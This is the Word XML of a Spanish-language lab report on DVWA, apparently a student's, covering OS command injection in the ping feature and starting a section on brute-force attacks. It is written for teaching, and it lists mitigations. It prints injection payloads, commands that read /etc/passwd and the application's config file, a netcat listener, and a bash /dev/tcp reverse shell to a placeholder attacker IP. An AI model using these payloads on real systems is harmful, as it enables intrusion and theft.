          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// Sin escapeshellarg(), sin regex de IP, sin lista blanca</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7425C17E"/>
    <w:p w14:paraId="73864EA7">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CWE-78 (OS Command Injection) es consistentemente clasificada en OWASP Top 10 Inside A03:2021 como una de las vulnerabilidades de mayor impacto real. Históricamente, vulnerabilidades como Shellshock (CVE-2014-6271) demostraron que un server Bash mal configurado podía comprometerse con una sola petición HTTP maliciosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126C268">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>1. Descripción de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF5DE0D">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La funcionalidad de "ping" de DVWA toma una dirección IP del usuario y la pasa a shell_exec() concatenada como argumento. Dado que PHP no escapa los metacaracteres de shell ni restringe el formato del input, el atacante puede encadenar comandos adicionales usando separadores como ; o &amp;&amp;, logrando ejecución arbitraria de comandos con los privilegios del proceso web del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F0AFF">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>2. Causas de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B832A61">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>a. Ausencia de validaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EF5636">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No se verifica que $target tenga formato de dirección IPv4. Cualquier cadena, incluidas las que contienen metacaracteres de shell, es aceptada y pasada a shell_exec().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CF336E"/>
    <w:p w14:paraId="143682DD">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>b. Errores de lógica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081576C5">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La aplicación no distingue entre el argumento del comando (dato: la IP) y el comando en sí. Al concatenar directamente, el SO recibe una cadena completa que puede contener múltiples comandos separados por metacaracteres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1BF52"/>
    <w:p w14:paraId="3B1FD6ED">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>c. Manejo inadecuado de entradas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0639DE">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No se usa escapeshellarg() ni escapeshellcmd(). Los metacaracteres ; &amp;&amp; || | ` $() no son eliminados ni escapados antes de construir el comando del SO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111632C4">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3. Mecanismo de ataque — Ejecución de comandos arbitrarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AE6D80">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Objetivo: ejecutar comandos del SO del servidor a través del campo de ping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB2849"/>
    <w:p w14:paraId="21FB3304">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 1 — Confirmar baseline (comportamiento legítimo):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535C23B9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Input: 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Comando resultante: ping -c 4 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Respuesta: salida normal de ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2E024C">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 2 — Inyección con ; (ejecución secuencial):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B492AEF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Input: 127.0.0.1 ; id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Comando resultante: ping -c 4 127.0.0.1 ; id</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Respuesta incluye:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A4F694">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[IMAGEN 4 — Command injection con ;id mostrando uid del servidor — fecha visible]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0606BE41"/>
    <w:p w14:paraId="3A4C1AEE">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 3 — Enumeración del sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530EBFA1">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>127.0.0.1 ; uname -a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>127.0.0.1 ; cat /etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>127.0.0.1 ; ls /var/www/html/dvwa/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>127.0.0.1 ; cat /var/www/html/dvwa/config/config.inc.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE023E8">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Paso 4 — Reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23182D13">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Listener en Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>danielaguirre@kali:~$ nc -lvnp 4444</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 Payload inyectado en el campo IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>127.0.0.1 ; bash -i &gt;&amp; /dev/tcp/&lt;IP_KALI&gt;/4444 0&gt;&amp;1</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 Shell interactiva del servidor obtenida en la consola de Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEEF047">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[IMAGEN 5 — Reverse shell obtenida vía Command Injection — fecha visible]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C89519">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>4. Clasificación técnica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4AD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864"/>
          </w:tcPr>
          <w:p w14:paraId="63B2C628">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Referencia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="0A7C0212">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Detalle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5772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A11F236">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CWE-78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DC040F6">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OS Command Injection — neutralización impropia de elementos especiales en comandos del SO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7B01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5CD5AA60">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2014-6271</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="347923F6">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Shellshock — command injection masivo en Bash a través de variables de entorno HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="37A5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7BB9A6B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A9AF91B">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A03:2021 – Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="527C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654047A4">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS v4.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="3EBA2CF9">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>~9.8 Critical — ejecución remota de comandos sin autenticación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0948DB9A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>5. Impacto esperado en un sistema real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1AD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864"/>
          </w:tcPr>
          <w:p w14:paraId="0BFDFDA8">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dimensión CIA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="1D7B906F">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Impacto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="1E2D3CBF">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Justificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7B95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220412">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Confidencialidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F02475F">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CRÍTICO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39B43D94">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lectura de cualquier archivo accesible por www-data: claves SSH, credenciales de BD, código fuente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="014F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58D8518D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Integridad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7CD2DF6F">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CRÍTICO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0E6D8E79">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Escritura de archivos, instalación de malware, creación de nuevos usuarios del SO, modificación de logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="45D3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A3B84D">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Disponibilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17C01461">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CRÍTICO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BC41E44">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Apagado del servidor, eliminación de archivos críticos, denegación de servicio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38E87D1D">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>6. Propuesta de mitigación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F27640">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Evitar completamente shell_exec(), exec(), system(), passthru() — usar funciones nativas del lenguaje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B63BADB">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Si es indispensable: validar con regex de IP estricta antes de llamar al SO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E41CEF">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if (preg_match('/^(\d{1,3}\.){3}\d{1,3}$/', $target)) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    $cmd = shell_exec('ping -c 4 ' . escapeshellarg($target));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBB8451">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>escapeshellarg(): envuelve el argumento en comillas simples y escapa comillas internas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D1C7CD">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Principio de mínimo privilegio: el proceso web no debe tener acceso de escritura al SO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F8E5EB">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>WAF: bloquear patrones de metacaracteres de shell en parámetros HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1082AA52">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>──────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C1957">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B1117">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerabilidad 7 — Brute Force (Fuerza Bruta sobre Autenticación)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1274D80A">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Teoría</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321881F3">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un ataque de fuerza bruta sobre autenticación prueba sistemáticamente combinaciones de credenciales hasta encontrar las válidas. Existen dos variantes principales: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4E9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864"/>
          </w:tcPr>
          <w:p w14:paraId="022CD87B">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Variante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="57B51C76">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
          </w:tcPr>
          <w:p w14:paraId="47ACC39F">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Herramienta típica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0D5C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619C36">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Fuerza bruta pura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ADD6092">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Prueba todas las combinaciones posibles de caracteres hasta alcanzar la longitud máxima.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DE0FA10">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>hashcat, john</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E8B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75B75027">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ataque de diccionario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="58AFF59F">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Prueba contraseñas de una lista precompilada de palabras reales, comunes o filtradas de brechas previas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DCE8F8"/>
          </w:tcPr>
          <w:p w14:paraId="540348A6">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hydra, Medusa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="260F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ADAFF6">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Credential stuffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24B43D81">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Usa pares usuario/contraseña reales obtenidos de brechas anteriores y los prueba en otros servicios.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14C00887">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Snipr, Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D7DD8FF"/>
    <w:p w14:paraId="770EB673">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>El ataque de diccionario es el más común en la práctica: la wordlist rockyou.txt contiene ~14 millones de contraseñas reales filtradas de la brecha de RockYou (2009). La mayoría de usuarios reutilizan contraseñas débiles o predecibles, lo que hace que este ataque sea efectivo en segundos contra sistemas sin mecanismos de protección.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED4EB8"/>
    <w:p w14:paraId="6FCB1A97">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Problemas de seguridad del mecanismo de autenticación de DVWA nivel Low:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4D2DD5">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Formulario usa método GET — credenciales viajan en la URL, visibles en logs del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3AC86F">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Sin límite de intentos fallidos (account lockout).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539B7A00">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Sin CAPTCHA ni challenge-response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC1191">
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:t>Sin rate limiting (no hay restricción de velocidad de peticiones).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4AB5E2">
      <w:pPr>
